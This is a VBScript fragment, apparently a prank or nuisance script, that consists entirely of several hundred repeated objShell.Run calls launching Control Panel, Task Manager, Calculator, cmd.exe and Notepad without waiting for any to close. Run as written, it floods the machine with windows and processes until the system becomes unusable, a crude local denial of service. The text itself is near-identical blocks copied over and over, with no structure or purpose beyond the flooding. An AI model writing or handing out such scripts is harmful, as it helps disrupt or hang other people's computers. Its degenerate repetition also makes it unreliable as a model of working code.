objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False
